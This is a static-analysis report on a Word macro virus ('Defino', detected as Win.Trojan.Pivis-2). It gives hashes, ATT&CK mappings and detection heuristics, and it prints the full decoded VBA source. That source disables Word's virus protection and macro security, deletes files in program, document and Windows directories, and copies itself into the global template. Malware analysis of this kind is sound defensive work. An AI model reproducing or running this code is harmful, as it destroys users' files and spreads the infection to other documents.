Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 a5580a56192e7d20…

MALICIOUS

Office (OLE)

32.0 KB Created: 2005-02-03 00:43:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: a15dee08b12b9a58f345a2234bf8737a SHA-1: c99d11c4066ef1eb324c7c613282c65176304b9d SHA-256: a5580a56192e7d20eda2aaa9bf121ca95bc8465823d20e6bb584cd5fe7221880
260 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1490 Inhibit System Recovery

The sample exhibits high-confidence indicators of legacy WordBasic macro virus activity and contains VBA macros. The AutoOpen macro attempts to disable Word's virus protection and modify Internet Explorer's color settings. It also attempts to delete files in common program and document directories, indicating an attempt to disrupt system recovery.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3655 bytes
SHA-256: 728cb131215c7fd1dd2d9cc3f747ed2b76c47510af05bb4fc49d128eec9f8b2e
Detection
ClamAV: Doc.Trojan.Efin-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Efine"
'Virus: Defino
'Escrito por : Brasileiro.
'=========================
'Brasil 2005
'-------------------------

Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro virus Defino"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Efine.AutoOpen"
On Error Resume Next
With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With
Application.Caption = UserName & ">==================Virus word macro====================="

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Anchor Color") = " 139,69,19" ' Brown
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Anchor Color Visited") = " 255,255,0" ' Yellow
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Background Color") = " 0,0,255" ' Blue
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Text Color") = " 255,0,0" 'Red
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Use Anchor Hover Color") = " yes"

WordBasic.Kill "C:\Arquivos de programas\*.*"
WordBasic.Kill "C:\Program Files\*.*"
WordBasic.Kill "C:\My Documents\*.*"
WordBasic.Kill "C:\Meus Documentos\*.*"
WordBasic.Kill "C:\WINDOWS\Command\*.*"
WordBasic.Kill "C:\WINDOWS\Temp\*.*"
WordBasic.Kill "C:\WINDOWS\Help\*.*"
WordBasic.Kill "C:\WINDOWS\Fonts\*.*"
MsgBox " Virus fez uma limpeza!", vbOKOnly + vbCritical, " Macro virus informa!!"

If Day(Now()) = 7 Or (Day(Now)) = 15 Or (Day(Now)) = 21 Or (Day(Now)) = 29 Then
MsgBox " Virus deletou arquivos!!", vbOKOnly + vbCritical, "Virus esclarece!!"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"

End If
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro virus Defino"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Efine.AutoClose"
On Error Resume Next

    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 145
        ActiveDocument.SaveAs FileName:=("Virtual" & i & ".DOC")
    
    Next
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Efine" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Efine" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Efine"
    WordBasic.MacroCopy sMacro$, "Global:Efine"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Efine"
    
End If

End Sub

Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro virus Defino"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Efine.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub



'Infecta documentos word.
'Infect word documents.
'<><>Word Macro virus<><>
'=========================
'Ano 2005 - Brasil
'-------------------------

Open this report in the interactive analyzer, or submit your own file for analysis.